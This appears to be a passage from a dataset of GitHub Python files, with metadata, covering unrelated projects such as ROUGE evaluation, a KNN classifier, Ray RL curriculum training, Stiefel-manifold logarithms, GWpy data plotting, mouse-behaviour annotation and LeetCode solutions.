['subject', 'object', 'aspect', 'result']\n self.polarity_col = ['None', 'COM', 'COM+', 'COM-', 'SUP', 'SUP+', 'SUP-', 'EQL', 'DIF']\n # self.polarity_dict = {k: index for index, k in enumerate(self.polarity_col)}\n self.polarity_dict = {k: index -1 for index, k in enumerate(self.polarity_col)}\n # self.polarity_dict ={\n # \"COM\": 1,\n # \"COM-\":-1,\n # \"COM+\": 2,\n # \"SUP\": 3,\n # \"SUP-\":-2,\n # \"SUP+\": 4, \n # \"DIF\":-3,\n # \"EQL\": 0\n # }\n if position_sys == 'SPAN': # include (s_index, e_index)\n self.position_sys = []\n else: \n self.position_sys = list(position_sys) # BIEOS = [B, I, E, O, S]\n \n self.special_id_map, self.norm_id_map = {\"O\": 0}, {\"O\": 0}\n\n # other flag is \"O\"\n # Tạo dictionmary chứa các pos_sys-element và giá trị số (như key-value) của nó\n # {'O': 0, 'B': 1, 'M': 2, 'E': 3, 'S': 4}\n self.norm_id_map = eval_shared_modules.create_tag_mapping_ids([], self.position_sys, other_flag=True)\n # {'O': 0, 'B-entity_1': 1, 'M-entity_1': 2, 'E-entity_1': 3, 'S-entity_1': 4, 'B-entity_2': 5, 'M-entity_2': 6, so on ...}\n self.special_id_map = eval_shared_modules.create_tag_mapping_ids(self.polarity_col, self.position_sys, other_flag=True)\n\n # đảo chiều dictionnary ở trên value: key\n self.invert_special_id_map = {v: k for k, v in self.special_id_map.items()}\n self.invert_norm_id_map = {v: k for k, v in self.norm_id_map.items()}\n\n","repo_name":"haiyen040602/VLSP2023","sub_path":"coqe_base/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30272211548","text":"import yaml\nfrom copy import deepcopy\nimport uuid\ndoc = yaml.load(open(\"updates.yaml\").read(),Loader=yaml.Loader)\n\ndeets = doc[\"detailed_collection\"]\ntemplate = doc[\"detailed_collection\"][0]\n\ndef addUpdates(deet):\n print()\n [name,info] = deet\n line = input(f\"updates for {name}, enter 'no' if not: \").strip()\n new_updates = []\n if line == \"no\" or line == \"\":\n info[\"newUpdates\"] = False\n else:\n info[\"newUpdates\"] = True\n while not line == \"done\" and not line == \"\":\n new_updates.append(line)\n line = input(f\"updates for {name} write 'done' or '' to stop: \").strip()\n print(\"adding\",new_updates,\" to info\")\n info[\"updates\"].insert(0,new_updates)\n\nfor element in deets[1:]:\n [name,info] = element\n if info[\"status\"] == \"active\" :\n print(name)\n print(\"active project\")\n addUpdates(element)\n\n## adding new projects section\n# new_proj = input(\"add new project by name? \").strip()\n# while not new_proj == \"no\" and not new_proj == '':\n# new_proj_obj = deepcopy(template)\n# print(new_proj_obj)\n# new_proj_obj[0] = new_proj\n# print(new_proj_obj)\n# new_proj_obj[1][\"type\"] = input(\"collaboration/consult/infrastructure? \").strip()\n# ## get rid of None update\n# addUpdates(new_proj_obj)\n# ## insert it into the doc\n# deets.insert(1,new_proj_obj)\n# new_proj = input(\"add new project by name? \").strip()\n\n\n\n##write out the result\nwith open(f\"test.yml{uuid.uuid1()}\",\"w\") as phile:\n phile.write(yaml.dump(doc,default_flow_style= False))\n\n\n\n","repo_name":"DevinBayly/weekly_reports","sub_path":"interactive_fillout.py","file_name":"interactive_fillout.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70505743123","text":"from __future__ import print_function\nfrom collections import Counter\nimport string\nimport re\nimport argparse\nimport json\nimport datasets\nimport numpy as np\nfrom typing import List, Dict\nrouge_metric = datasets.load_metric('rouge')\ndef rouge(prediction, ground_truth):\n score = rouge_metric.compute(\n predictions=[prediction],\n references=[ground_truth],\n **{'use_agregator': False, 'use_stemmer': True, 'rouge_types': ['rougeL']}\n )\n return score['rougeL'][0].fmeasure\ndef metric_max_over_ground_truths(metric_fn, prediction, ground_truths):\n scores_for_ground_truths = []\n for ground_truth in ground_truths:\n score = metric_fn(prediction, ground_truth)\n scores_for_ground_truths.append(score)\n return max(scores_for_ground_truths)\ndef evaluate(dataset, predictions):\n metrics = {}\n for i in range(len(predictions)):\n pred=predictions[i]['output']\n gold_input=dataset['Instances'][predictions[i]['index']]['input']\n gold_outputs=dataset['Instances'][predictions[i]['index']]['output']\n if 'rouge' not in metrics:\n metrics['rouge']= 0\n metrics['rouge'] += metric_max_over_ground_truths(rouge, pred, gold_outputs)\n\n for key in metrics.keys():\n metrics[key] /= len(predictions)\n\n return metrics\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--dataset\",\n type=str,\n required=True,\n help=\"Dataset Json File Name\")\n parser.add_argument(\"--predictions\",\n type=str,\n required=True,\n help=\"Prediction File Name\")\n args = parser.parse_args()\n with open(args.dataset) as dataset_file:\n dataset_json = json.load(dataset_file)\n with open(args.predictions) as prediction_file:\n predictions_json = json.load(prediction_file)\n print(evaluate(dataset_json,predictions_json['predictions']))\nif __name__ == \"__main__\":\n main()","repo_name":"allenai/natural-instructions-v1","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"25554629426","text":"#! usr/bin/python\n\n# 1688. Count of Matches in Tournament\n\ndef count(n: int, r: int = 0) -> int:\n if n == 2:\n return r + 1\n if n & 1 != 1:\n return count(n//2, r + n//2)\n else:\n return count((n - 1)//2 + 1, r + (n - 1)//2)\n\n\nclass Solution:\n def numberOfMatches(self, n: int) -> int:\n if n < 2:\n return 0\n return count(n)\n\n\nif __name__ == '__main__':\n # case 1\n # n = 7\n # case 2\n n = 14\n\n solution = Solution()\n answer = solution.numberOfMatches(n)\n print(answer)\n","repo_name":"beskrovniibv/leetcode","sub_path":"1688/1688.1.py","file_name":"1688.1.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27105446632","text":"import numpy as np\n\n# Normalize ranges\ndef normalize_distances(train):\n scalars = []\n train_n = np.copy(train)\n for i in range(1, len(train[0])):\n feature_max = np.amax(train[:,i])\n for j in range(0, len(train[:,i])):\n train_n[j][i] = train[j][i] / feature_max\n scalars.append(feature_max)\n return (train_n, scalars)\n\n# Define distance function\ndef calculate_distance(a, b):#only features passed in here\n total = 0\n for i in range(0, len(a)):\n total += (a[i] - b[i])*(a[i] - b[i])\n return total**0.5\n\n# Get distances of all training data to test data\ndef get_distances(train_n, one_test_vector):\n distances = []\n for i in range(0, len(train_n)):\n single_distance = [calculate_distance(train_n[i][1:], one_test_vector)]\n single_distance.append(train_n[i][0])\n distances.append(single_distance)\n return distances\n\n# Currently takes one test sample, assumes the first column as label\nclass KNN(object):\n def __init__(self, train):\n (self.train_n, self.scalars) = normalize_distances(train)\n\n def predict(self, input_vector, k):\n self.scaled_input = np.empty(len(input_vector)-1)\n for i in range(0, len(self.scalars)):\n self.scaled_input[i] = input_vector[i+1] / self.scalars[i]\n self.unsorted_distances = get_distances(self.train_n, self.scaled_input)\n # Top K nearest distances with predictions\n self.sorted_distances = sorted(self.unsorted_distances, key=lambda tup: tup[0])[0:k]\n # Alternative quick mode, specific to labels -1 and 1 (stats.mode would operate better on differently structured arrays)\n my_sum = 0\n for j in range(0, k):\n my_sum += self.sorted_distances[j][1]\n if(my_sum >= 0):\n self.prediction = 1\n elif(my_sum < 0):\n self.prediction = -1\n return self.prediction","repo_name":"markuswoltjer/CS434","sub_path":"HW3/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7120089104","text":"\nfrom types import NoneType\nfrom Listas_Encadeadas import*\nfrom Conversor_Posfixo import*\n\ndef faz_operacao(op,x,y):\n if op == \"+\":\n return x+y\n elif op == \"-\":\n return x-y\n elif op==\"*\":\n return x*y\n elif op==\"/\":\n return x/y\n else:\n return False\n\ndef avaliarPosfixa(expressao):\n pilha=Lista_encadeada()\n for i in range(len(expressao)):\n unidade=expressao[i]\n if unidade >=\"0\" and unidade<=\"9\":\n pilha.adicionar_lista(unidade)\n else:\n try:\n x=int(pilha.desempilhar())\n y=int(pilha.desempilhar())\n except AttributeError:\n print(\"Operador a mais na expressao\")\n exit() \n valor=faz_operacao(unidade,x,y)\n\n if valor:\n pilha.adicionar_lista(valor)\n else:\n return \"Operador não registrado ou Invalido\"\n resultado=pilha.desempilhar()\n if pilha.eVazio():\n return resultado\n else:\n return \"Expressao invalida\"\n\n","repo_name":"Itossai/Projetos_Estrutura","sub_path":"Projeto 1/Verificador.py","file_name":"Verificador.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22025747470","text":"def resposta(r):\n if r == 'variavel':\n return ':)' * 100\n \n\n\ndef main():\n r = input('No python, como se chama uma \"caixa\" usada para armazenar dados? ')\n \n r1 = resposta(r)\n \n print(f'{r1}')\n\n print('Obrigado por jogar!')\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"josevitor32/atividades-pec","sub_path":"Atividade01-sem07-/passo 01.py","file_name":"passo 01.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6831115850","text":"#------------------------------------------------------------------------------\n#\n# Basic test for Stiefel log:\n#\n# Compute the average iteration count for the Stiefel Log for\n# input data that are a preselected Riemannian distance apart.\n#\n#\n# This script is an illustrative example for \n# solving the local geodesic endpoint problem\n# = computing the Riemannian logarithm on the Stiefel manifold.\n#\n# The algorithms work for a one-parameter family of metrics, including the \n# Euclidean and the canonical metric.\n# The canonical metric allows for special algorithmic treatment.\n# For all other metrics, a tailored shooting method is invoked.\n#\n# For theoretical background and description of the algorithms, see\n#\n# R. Zimmermann, K. H\\\"uper.\n# \"Computing the Riemannian logarithm on the Stiefel manifold: \n# metrics, methods and performance\", arXiv:2103.12046, March 2022\n#\n# If you make use of these methods, please cite the aforementioned reference.\n#\n#\n# @author: Ralf Zimmermann, IMADA, SDU Odense\n#------------------------------------------------------------------------------\n\nimport scipy\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\n# local module\nimport Stiefel_Exp_Log as StEL\n\nprint('Running script_Stiefel_Log_basic_test.py')\n\n# *** BEGIN: USER PARAMETERS ***\n# set dimensions\nn = 100\np = 40\n# choose metric parameter: alpha = -0.5: Euclidean, alpha = 0.0: canonical\nalpha = -0.0\n# numerical convergence threshold\ntau = 1.0e-12\n# set number of random experiments\nruns = 10\n# set distance of Stiefel points\ndist = 0.7*scipy.pi\n# plot convergence history of last run?\ndo_plot = True\n# *** END: USER PARAMETERS ***\n\n\n# initialize iteration counter\naverage_iters = 0.0\n# initialize accuracy indicator\naverage_acc = 0.0\nfor j in range(runs):\n #create random Stiefel data\n U0, U1, Delta = StEL.create_random_Stiefel_data(n, p, dist, alpha)\n \n # compute the Stiefel logarithm\n Delta_rec, conv_hist = StEL.Stiefel_Log(U0, U1, tau, alpha); \n # check, if Stiefel logarithm recovers Delta\n num_acc = linalg.norm(Delta_rec - Delta, 'fro')/linalg.norm(Delta, 'fro')\n print('recovery up to:', num_acc)\n average_iters = average_iters + len(conv_hist)\n average_acc = average_acc + num_acc\n#end for...\n \naverage_iters = average_iters/runs\naverage_acc = average_acc/runs\nprint('The average iteration count of the Stiefel log is ', average_iters)\nprint('The average relative accuracy of the Stiefel log is ', average_acc)\n\nif do_plot:\n #plot the convergence history of the last run:\n # create plot object \n fig, ax1 = plt.subplots()\n \n # plot convergence history\n ax1.semilogy(range(len(conv_hist)), conv_hist, 'ko-')\n ax1.set_title(\"Convergence history (last run)\")\n \n plt.xlabel(\"iterations\")\n plt.ylabel(\"error\")\n \n # execute the plot\n plt.show()","repo_name":"RalfZimmermannSDU/RiemannStiefelLog","sub_path":"Stiefel_log_general_metric/SciPy/script_Stiefel_Log_basic_test.py","file_name":"script_Stiefel_Log_basic_test.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"13041545753","text":"__author__ = \"Duncan Macleod \"\n__currentmodule__ = \"gwpy.timeseries\"\n\n# Firstly, we can use the |gwosc-mod| Python package to query for the\n# time of the first gravitational-wave detection |GW150914|:\n\nfrom gwosc.datasets import event_gps\ngps = event_gps(\"GW150914\")\n\n# GWpy's `TimeSeries` class provides an interface to the public |GWOSC|\n# data in the :meth:`~TimeSeries.fetch_open_data` method; to use it we\n# need to first import the `TimeSeries` object:\n\nfrom gwpy.timeseries import TimeSeries\n\n# then call the :meth:`~TimeSeries.fetch_open_data` method, passing it the\n# prefix for the interferometer we want (`'L1'` here for LIGO-Livingston),\n# and the GPS start and stop times of our query (based around the GPS time\n# for GW150914):\n\ndata = TimeSeries.fetch_open_data('L1', gps-5, gps+5)\n\n# and then we can make a plot:\n\nplot = data.plot(\n title=\"LIGO Livingston Observatory data for GW150914\",\n ylabel=\"Strain amplitude\",\n color=\"gwpy:ligo-livingston\",\n epoch=gps,\n)\nplot.show()\n\n# We can't see anything that looks like a gravitational wave signal in these\n# data, the amplitude is dominated by low-frequency detector noise.\n# Further filtering is required to be able to identify the GW150914 event\n# here, see :ref:`gwpy-example-signal-gw150914` for a more in-depth example of\n# extracting signals from noise.\n","repo_name":"gwpy/gwpy","sub_path":"examples/timeseries/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"17854948364","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 8 11:50:18 2021\n\n@author: sound\n\"\"\"\n##Library for loading data\nimport m24\n##Basic libraries for plotting and working with arrays\nimport matplotlib.pyplot as plt\nimport numpy as np\n######Custom functions\nimport m24_functions as fn\n######Library for managing files\nimport os\n########################### Excess Kurtosis and Skewness\nfrom scipy.stats import kurtosis\nfrom scipy.stats import skew\n##\nimport glob\n#\n\n#####################################\n#creating plots\nactual=\"D:/m24_load_javier\"\ns_areas=['S1','S2','MPC-left','MPC-right','VPC','M1','DPC']\ncondiciones=['c1','c2','c3','c4']\nfor c in condiciones:\n for a in s_areas:\n moments=['MEAN','STD','KUR','SK']\n mom={'KUR':'Excess Kurtosis','STD':'Standard Deviation','MEAN':'Mean','SK':'Skewness'}\n ################\n for m in moments:\n directory=actual+f\"/Data/{a}_Conditions_Dist/{c}/{m}\"\n \n x=fn.getFilelist(directory,prefixo=f'{m}_exp*.npy')\n print(x)\n nx=len(x)\n \n data_wait=[]\n data_delay1=[]\n data_delay2=[]\n \n for i in range(nx):\n exp=np.load(x[i])\n data_wait.append(exp[0])\n data_delay1.append(exp[1])\n data_delay2.append(exp[2])\n \n data_wait=np.concatenate(data_wait)\n data_delay1=np.concatenate(data_delay1)\n data_delay2=np.concatenate(data_delay2)\n ############################################\n directory=actual+f\"/plots/Allinone/{a}_conditions_Allexp/{c}/{m}\"\n print(directory)\n try:\n os.makedirs(directory)\n except OSError:\n print(\"The directory creation %s fail\" % directory)\n else:\n print(\"The directory has been created: %s \" % directory)\n \n fig = plt.figure(figsize=(11,6))\n ax=fig.add_subplot(1,1,1)\n samples=(data_wait,data_delay1,data_delay2)\n dists,bins=fn.getSamplesDistributions(samples)\n dist1,dist2,dist3=dists\n #ax.set_yscale('log')\n ax.plot(bins[1:],dist1, label='Wait',color='blue',alpha=0.7)\n ax.plot(bins[1:],dist2,label='Delay 1',color='red',alpha=0.7)\n ax.plot(bins[1:],dist3,label='Delay 2',color='green',alpha=0.7)\n ax.set_title(f'Probability distribution of {mom[m]} in {a}\\n during All epochs\\n All exp \\n condition{c}')\n ax.legend()\n ax.set_xlabel('units')\n ax.set_ylabel('Probability')\n fsave=(f\"D:/m24_load_javier/plots/Allinone/{a}_conditions_Allexp/{c}/{m}/{c}_{m}_{a}_conditions_ALlepochs.svg\")\n fig.savefig(fsave)\n print(fsave)\n plt.close('all')\n \n \n","repo_name":"soundingreen/professional-internship-historical","sub_path":"m24_load_javier_vFINAL/plot_All_Moments_Dists_All_Areas_conditions_by_All_epochs_in_one.py","file_name":"plot_All_Moments_Dists_All_Areas_conditions_by_All_epochs_in_one.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71397624081","text":"import yaml\n\nimport ray\nfrom ray import tune\nfrom ray.rllib.agents.callbacks import DefaultCallbacks\nfrom soccer_twos import EnvType\n\nfrom utils import create_rllib_env, sample_pos_vel, sample_player\n\n\nNUM_ENVS_PER_WORKER = 3\n\ncurrent = 0\nwith open(\"curriculum.yaml\") as f:\n curriculum = yaml.load(f, Loader=yaml.FullLoader)\ntasks = curriculum[\"tasks\"]\nconfig_fns = {\n \"none\": lambda *_: None,\n \"random_players\": lambda env: env.set_policies(\n lambda *_: env.action_space.sample()\n ),\n}\n\n\nclass CurriculumUpdateCallback(DefaultCallbacks):\n def on_episode_start(\n self, *, worker, base_env, policies, episode, env_index, **kwargs\n ) -> None:\n global current, tasks\n\n for env in base_env.get_unwrapped():\n config_fns[tasks[current][\"config_fn\"]](env)\n env.env_channel.set_parameters(\n ball_state=sample_pos_vel(tasks[current][\"ranges\"][\"ball\"]),\n players_states={\n player: sample_player(tasks[current][\"ranges\"][\"players\"][player])\n for player in tasks[current][\"ranges\"][\"players\"]\n },\n )\n\n def on_train_result(self, **info):\n global current\n if info[\"result\"][\"episode_reward_mean\"] > 1.5:\n if current < len(tasks) - 1:\n print(\"---- Updating tasks!!! ----\")\n current += 1\n print(f\"Current task: {current} - {tasks[current]['name']}\")\n\n\nif __name__ == \"__main__\":\n ray.init()\n\n tune.registry.register_env(\"Soccer\", create_rllib_env)\n temp_env = create_rllib_env()\n obs_space = temp_env.observation_space\n act_space = temp_env.action_space\n temp_env.close()\n\n analysis = tune.run(\n \"PPO\",\n name=\"PPO_curriculum\",\n config={\n # system settings\n \"num_gpus\": 1,\n \"num_workers\": 14,\n \"num_envs_per_worker\": NUM_ENVS_PER_WORKER,\n \"log_level\": \"INFO\",\n \"framework\": \"torch\",\n \"callbacks\": CurriculumUpdateCallback,\n # RL setup\n \"env\": \"Soccer\",\n \"env_config\": {\n \"num_envs_per_worker\": NUM_ENVS_PER_WORKER,\n \"variation\": EnvType.team_vs_policy,\n \"multiagent\": False,\n \"flatten_branched\": True,\n \"single_player\": True,\n \"opponent_policy\": lambda *_: 0,\n },\n \"model\": {\n \"vf_share_layers\": True,\n \"fcnet_hiddens\": [256, 256],\n \"fcnet_activation\": \"relu\",\n },\n \"rollout_fragment_length\": 5000,\n \"batch_mode\": \"complete_episodes\",\n },\n stop={\n \"timesteps_total\": 15000000,\n \"time_total_s\": 7200, # 2h\n \"episode_reward_mean\": 1.9,\n },\n checkpoint_freq=5,\n checkpoint_at_end=True,\n local_dir=\"./ray_results\",\n # restore=\"./ray_results/PPO_selfplay_twos_2/PPO_Soccer_a8b44_00000_0_2021-09-18_11-13-55/checkpoint_000600/checkpoint-600\",\n )\n\n # Gets best trial based on max accuracy across all training iterations.\n best_trial = analysis.get_best_trial(\"episode_reward_mean\", mode=\"max\")\n print(best_trial)\n # Gets best checkpoint for trial based on accuracy.\n best_checkpoint = analysis.get_best_checkpoint(\n trial=best_trial, metric=\"episode_reward_mean\", mode=\"max\"\n )\n print(best_checkpoint)\n print(\"Done training\")\n","repo_name":"bryanoliveira/soccer-twos-starter","sub_path":"train_ray_curriculum.py","file_name":"train_ray_curriculum.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22510762535","text":"#!/usr/bin/python3.6\n#this script creates traninig data to create an ANN which classifies behavior\n#this is done by creating images of cropped out mice and annotating it depending on the behavior which is displayed\n#0 exploring\n#1 grooming\n#2 rearing\n#3 keep down\n#3 close following\n#4 sniffing\n\n\n#torch libaries\nfrom torchvision import transforms,datasets\nimport torch, torchvision, torch.optim as optim, torch.nn as nn, torch.nn.functional as F\n#general libaries\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt, cv2\nimport numpy as np, sys, os, cv2, random, math, time\n#own libaries\nimport net_handler as nh, data_manipulater as dm, image_analyser as ia\n\nprint('Is cuda available:\\t'+ str(torch.cuda.is_available()))\nprint('Available devices:\\t'+str(torch.cuda.device_count()))\nprint('Device 0 name:\\t'+ torch.cuda.get_device_name(0))\ntorch.cuda.set_device(0)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint('Using device:\\t'+ str(device))\nif device.type == 'cuda':\n print('Memory Usage:')\n print('\\tAllocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')\n print('\\tCached: ', round(torch.cuda.memory_cached(0)/1024**3,1), 'GB')\n\n#used to proper dislpay an image with opencv\ndef lucidDreaming(wait=True):\n while 1:\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n print('keyboard interuption: its getting dark')\n return True\n if k == 32:\n return False\n if not wait:\n return False\n\n#calculates the distance between two points\ndef get_distance(p1,p2):\n return round(math.sqrt((p1[0]-p2[0])**2+(p1[1]-p2[1])**2),2)\n\n#reutrn the contour of the biggest object in a binary image\ndef get_max_contour(binary):\n cnts,_ = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnt_max = []\n cnt_max_area = 0\n for cnt in cnts:\n tmp = np.zeros(binary.shape, np.uint8)\n tmp = cv2.drawContours(tmp, [cnt], -1, 255, -1)\n tmp = cv2.bitwise_and(binary,binary,mask=tmp)\n \n if np.sum(tmp) > cnt_max_area:\n cnt_max = cnt\n cnt_max_area = np.sum(tmp)\n return cnt_max\n\n#return a stack of images \"img_stacked\" containing only a specific region \"cnt\" of another stack of images \"imgs\"\ndef stack_different_imgs(imgs,cnt):\n stack = list()\n for img in imgs:\n img_tmp, bb = ia.get_fragment(img,cnt)\n stack.append(img_tmp)\n img_stacked = np.dstack(stack)\n return img_stacked, bb\n\n#combines the negative and positive prediction of two ANN\ndef combine_pos_neg(pos,neg,k=100):\n pos = dm.binary_it(pos,100,mask=True)\n neg = dm.binary_it(255-neg,100,mask=True)\n return cv2.bitwise_and(pos,neg)\n\n#load trained ANN \nkernel_size_conv = 9\nnet_whole = nh.create_net_3conv(kernel_size_conv,device=device)\nmodel_path = 'whole'\nnet_whole.load_state_dict(torch.load(model_path))\nnet_whole.eval()\ndim_whole = (128,128)\n\nkernel_size_conv = 9\nnet_fragment = nh.create_net_3conv(kernel_size_conv,device=device)\nmodel_path = 'fragment'\nnet_fragment.load_state_dict(torch.load(model_path))\nnet_fragment.eval()\ndim_fragment = (128,128)\n\nkernel_size_conv = 9\nnet_fragment_negative = nh.create_net_3conv(kernel_size_conv,device=device)\nmodel_path = 'fragment_negative'\nnet_fragment_negative.load_state_dict(torch.load(model_path))\nnet_fragment_negative.eval()\n\n#init video reader\nbase = 'test.avi'\npath_vid = base\ncap = cv2.VideoCapture(path_vid)\n\n#storage variables which will be annotated\nclass_this_list_1 = list()\nclass_this_list_2 = list()\nclass_this_list = list()\nclass_this_double_list = list()\nbehavior_list_1 = list()\nbehavior_list_2 = list()\ncenters_last = ((0,0),(100,100))\nlast = list()\n\nprint(\"start collecting data\")\nwhile 1:\n #read current frame\n ret,img = cap.read()\n #if video ended break while loop\n if not ret:\n break\n \n #make a first prediction for the whole current frame\n img_whole = nh.evaluate_plus_resizing(net_whole,img,dim_whole,device=device,normalize=nh.pytorch_normalize_3) \n \n #find contour of the shape of the first prediction\n cnts = ia.filtered_contours(img_whole)\n #make a second more accurate prediciton for each object of the first prediction\n #and combine them into a new image \"img_whole_plus_fragment\"\n img_whole_plus_fragment = np.zeros(img_whole.shape,dtype=np.uint8)\n for cnt in cnts:\n img_tmp, bb = ia.get_fragment(img,cnt)\n pos = nh.evaluate_plus_resizing(net_fragment,img_tmp,dim_fragment,device=device,normalize=nh.pytorch_normalize_3)\n neg = nh.evaluate_plus_resizing(net_fragment_negative,img_tmp,dim_fragment,device=device,normalize=nh.pytorch_normalize_3)\n img_fragment = combine_pos_neg(pos,neg)\n img_fragment = ia.remove_filtered_contours(img_fragment)\n \n \n img_whole_plus_fragment[bb[0]:bb[1],bb[2]:bb[3]] += img_fragment\n \n #find all the object from the second prediction\n cnts = ia.filtered_contours(img_whole_plus_fragment)\n \n #overlapping mice add to social interaction\n if len(cnts) == 1:\n class_this,_ = ia.get_fragment(img,cnts[0])\n class_this_mask,_ = ia.get_fragment(img,cnts[0],mask_it=True)\n class_this_double_list.append((class_this,class_this_mask))\n \n #single mice add to single behavior\n if len(cnts) == 2:\n #determine which mice is which\n centers = ia.center_of_contours(cnts)\n if get_distance(centers[0],centers_last[0]) + get_distance(centers[1],centers_last[1]) >= get_distance(centers[0],centers_last[1]) + get_distance(centers[1],centers_last[0]):\n cnts = [cnts[1],cnts[0]]\n centers = [centers[1],centers[0]]\n #save data which will be annotated \n centers_last = centers\n for cnt in cnts:\n class_this,_ = ia.get_fragment(img,cnt)\n class_this_mask,_ = ia.get_fragment(img,cnt,mask_it=True)\n \n if len(class_this_list_1) <= len(class_this_list_2):\n class_this_list_1.append((class_this,class_this_mask))\n else:\n class_this_list_2.append((class_this,class_this_mask))\n \n elif len(class_this_list_1) > 0:\n class_this_list.append(class_this_list_1)\n class_this_list.append(class_this_list_2)\n class_this_list_1 = list()\n class_this_list_2 = list()\n \n #break if 3000 elements were selected\n if len(class_this_list) == 3000:\n break\n \n\n#shuffle single behavior\nrandom.seed(42)\nnp.random.shuffle(class_this_list)\ntmp = list()\nfor it in class_this_list:\n tmp+=it\n\n\nbehavior = list()\n#-1 not determinable\n#0 exploring\n#1 grooming\n#2 rearing\nprint('Q rearing, W grooming, E exploring, esc quit, space skip')\nclass Found(Exception): pass\n#annotated single behavior by using the keybord\n#an image is shown to you and by pressing Q W E or space the image is annotated\ntry:\n for list_tmp in class_this_list:\n print('next_list')\n for index,split_this in zip(range(len(list_tmp)),list_tmp):\n img,cropped = split_this\n cv2.imshow('img',img) \n\n kk = 'filler'\n while(True):\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n print('its getting dark')\n raise Found\n if k == 113:#Q\n behavior.append(2)\n print('added',index,'to rearing')\n break\n if k == 119:#W\n behavior.append(1)\n print('added',index,'to grooming')\n break\n if k == 101:#E\n behavior.append(0)\n print('added',index,'to exploring')\n break\n if k == 32:\n print('added',index,'to not determinable')\n break\n\n #plt.imshow(img_without_background)\nexcept Found:\n pass\nprint(len(behavior))\ncv2.destroyAllWindows()\n\n\n\nbehavior = list()\n#-1 not determinable\n#3 keep down\n#4 close following\n#5 sniffing\n#0 exploring\nprint('Q sniffing, W close following, E keeping down, R exploring, esc quit, space skip')\n#annotated social behavior by using the keybord\n#an image is shown to you and by pressing Q W E R or space the image is annotated\ntry:\n for index,split_this in zip(range(len(class_this_double_list)),class_this_double_list):\n img,cropped = split_this\n cv2.imshow('img',img) \n\n kk = 'filler'\n while(True):\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n print('its getting dark')\n raise Found\n if k == 113:#Q\n behavior.append((cropped,5))\n print('added',index,'to sniffing')\n break\n if k == 119:#W\n behavior.append((cropped,4))\n print('added',index,'to close following')\n break\n if k == 101:#E\n behavior.append((cropped,3))\n print('added',index,'to keeping down')\n break \n if k == 114:#R\n behavior.append((cropped,0))\n print('add, ',index,'to Nothing')\n break\n if k == 32:#space\n print('added',index,'to not determinable')\n break\n\nexcept Found:\n pass\nprint(len(behavior))\ncv2.destroyAllWindows()\n\n\nX = list()\ny = list()\n#formate annotated behavior and save it \nfor cropped, behav in behavior:\n cropped = cv2.resize(cropped, (128,128), interpolation = cv2.INTER_AREA)\n X.append(cropped)\n \n ohv = [0]*(6)\n ohv[behav] = 1\n y.append(ohv)\nX = np.array(X)\ny = np.array(y)\nprint(X.shape,y.shape)\nnp.save('X_class.npy',X)\nnp.save('y_class.npy',y)","repo_name":"Robinkoehler1995/BehaviorPrediction","sub_path":"Annotate_Behavior.py","file_name":"Annotate_Behavior.py","file_ext":"py","file_size_in_byte":9789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14567892106","text":"import time, re\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom typing import List, Tuple, Union, Optional\nfrom heapq import heappop, heappush, heapify, heappushpop, heapreplace\nfrom collections import defaultdict, deque, Counter\nfrom itertools import accumulate, permutations, combinations, product, compress, zip_longest, pairwise, groupby\nfrom math import perm, comb, gcd, lcm, inf, ceil, floor, factorial, dist, sqrt\nfrom functools import cache, lru_cache, reduce\nfrom sortedcontainers import SortedList, SortedSet, SortedDict\nfrom bisect import bisect_left, bisect_right, insort, insort_left, insort_right\n\n\nclass Trie:\n\n def __init__(self):\n self.children = {}\n self.isEnd = False\n\n def insert(self, arr) -> None:\n node = self\n for ch in arr:\n if ch not in node.children:\n node.children[ch] = Trie()\n\n node = node.children[ch]\n node.isEnd = True\n\n\nclass Solution:\n def removeSubfolders(self, folder: List[str]) -> List[str]:\n folder.sort(key=lambda x: len(x))\n\n trie = Trie()\n\n res = []\n for fold in folder:\n fs = fold.split(\"/\")[1:]\n trie.insert(fs)\n\n def dfs(t, s):\n if t.isEnd:\n res.append(s)\n return\n for k in t.children:\n dfs(t.children[k], s + \"/\" + k)\n\n dfs(trie, \"\")\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n 